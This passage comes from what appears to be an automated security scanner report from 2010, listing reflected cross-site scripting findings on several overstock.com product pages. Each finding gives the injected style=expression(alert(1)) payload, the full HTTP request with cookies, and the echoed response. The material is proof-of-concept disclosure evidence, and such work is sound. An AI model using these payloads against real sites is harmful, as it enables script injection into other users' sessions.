Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:06 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3469442|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 15:50:06 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=29
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 123316

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Ba
...[SNIP]...
<input type="hidden" name="f8bff"style="x:expression(alert(1))"c97f61e0979" value="1"/>
...[SNIP]...

2.21. http://www.overstock.com/Clothing-Shoes/Bamboo-by-Journee-Womens-Slouchy-Microsuede-Boots/3830685/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouchy-Microsuede-Boots/3830685/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2988"style%3d"x%3aexpression(alert(1))"e89b9f54e41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e2988"style="x:expression(alert(1))"e89b9f54e41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Bamboo-by-Journee-Womens-Slouchy-Microsuede-Boots/3830685/product.html?e2988"style%3d"x%3aexpression(alert(1))"e89b9f54e41=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:57:51 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:57:51 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3830685|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:51 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408271781:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:57:51 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=77
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 125179

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>Ba
...[SNIP]...
<input type="hidden" name="e2988"style="x:expression(alert(1))"e89b9f54e41" value="1"/>
...[SNIP]...

2.22. http://www.overstock.com/Clothing-Shoes/Black-Flys-Polarized-Micro-Flys-Sunglasses/1579444/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Black-Flys-Polarized-Micro-Flys-Sunglasses/1579444/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca6ff"style%3d"x%3aexpression(alert(1))"b12bf9c7c1e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca6ff"style="x:expression(alert(1))"b12bf9c7c1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Black-Flys-Polarized-Micro-Flys-Sunglasses/1579444/product.html?ca6ff"style%3d"x%3aexpression(alert(1))"b12bf9c7c1e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:56 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:56 GMT
Pragma: no-cache
Set-Cookie: cinfo=ccnt^0:ctmst^1289408216847:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:56 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=1579444|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:56 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=16
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 111210

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j20.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="ca6ff"style="x:expression(alert(1))"b12bf9c7c1e" value="1"/>
...[SNIP]...

2.23. http://www.overstock.com/Clothing-Shoes/Boston-Traveler-Mens-Suede-Moccasin-Slippers/4146348/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Boston-Traveler-Mens-Suede-Moccasin-Slippers/4146348/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5e7"style%3d"x%3aexpression(alert(1))"d793ce90ed2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7b5e7"style="x:expression(alert(1))"d793ce90ed2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Boston-Traveler-Mens-Suede-Moccasin-Slippers/4146348/product.html?7b5e7"style%3d"x%3aexpression(alert(1))"d793ce90ed2=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:56:09 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:56:09 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408169855:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4146348|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:09 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:56:09 GMT; Path=/
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 117837

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Bo
...[SNIP]...
<input type="hidden" name="7b5e7"style="x:expression(alert(1))"d793ce90ed2" value="1"/>
...[SNIP]...

2.24. http://www.overstock.com/Clothing-Shoes/Brooks-Womens-Adrenaline-ASR-6-Athletic-Shoes/4726004/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Brooks-Womens-Adrenaline-ASR-6-Athletic-Shoes/4726004/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0d68"style%3d"x%3aexpression(alert(1))"abff08642e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b0d68"style="x:expression(alert(1))"abff08642e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Brooks-Womens-Adrenaline-ASR-6-Athletic-Shoes/4726004/product.html?b0d68"style%3d"x%3aexpression(alert(1))"abff08642e=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:56 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:56 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:56 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4726004|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:56 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408156590:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=75
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 120068

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j14.overstock.com ssl:false -->


<head>

<title>Br
...[SNIP]...
<input type="hidden" name="b0d68"style="x:expression(alert(1))"abff08642e" value="1"/>
...[SNIP]...

2.25. http://www.overstock.com/Clothing-Shoes/Cashmere-Showroom-Signature-Cashmere-Oversized-Scarf/4141562/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Cashmere-Showroom-Signature-Cashmere-Oversized-Scarf/4141562/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 941de"style%3d"x%3aexpression(alert(1))"3a880e61ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 941de"style="x:expression(alert(1))"3a880e61ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Cashmere-Showroom-Signature-Cashmere-Oversized-Scarf/4141562/product.html?941de"style%3d"x%3aexpression(alert(1))"3a880e61ac=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:19 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:19 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404939574:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4141562|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:19 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:19 GMT; Path=/
Keep-Alive: timeout=5, max=71
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 116936

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Ca
...[SNIP]...
<input type="hidden" name="941de"style="x:expression(alert(1))"3a880e61ac" value="1"/>
...[SNIP]...

2.26. http://www.overstock.com/Clothing-Shoes/Collezione-Mens-Lambskin-Leather-Jacket/3920123/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/Collezione-Mens-Lambskin-Leather-Jacket/3920123/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b03f"style%3d"x%3aexpression(alert(1))"e0cdb060d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5b03f"style="x:expression(alert(1))"e0cdb060d8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/Collezione-Mens-Lambskin-Leather-Jacket/3920123/product.html?5b03f"style%3d"x%3aexpression(alert(1))"e0cdb060d8=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:00:14 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:00:14 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=3920123|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:14 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404814530:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:00:14 GMT; Path=/
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113961

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Co
...[SNIP]...
<input type="hidden" name="5b03f"style="x:expression(alert(1))"e0cdb060d8" value="1"/>
...[SNIP]...

2.27. http://www.overstock.com/Clothing-Shoes/DKNY-Womens-Long-Quilted-Zip-front-Down-Coat/5129186/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Clothing-Shoes/DKNY-Womens-Long-Quilted-Zip-front-Down-Coat/5129186/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3b05"style%3d"x%3aexpression(alert(1))"7c4fc8bbbe7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3b05"style="x:expression(alert(1))"7c4fc8bbbe7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Clothing-Shoes/DKNY-Womens-Long-Quilted-Zip-front-Down-Coat/5129186/product.html?b3b05"style%3d"x%3aexpression(alert(1))"7c4fc8bbbe7=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:55:01 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:55:01 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:01 GMT; Path=/
Set-Cookie: mxcproclicks=5129186|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:55:01 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408101862:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=46
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 117426

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>DK
...[SNIP]...
<input type="hidden" name="b3b05"style="x:expression(alert(1))"7c4fc8bbbe7" value="1"/>
...[SNIP]...

2.28. http://www.overstock.com/Clothing-Shoes/Daxx-Mens-Top-Grain-Deerskin-Leather-Gloves-with-Thinsulate-Lining/2092746/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
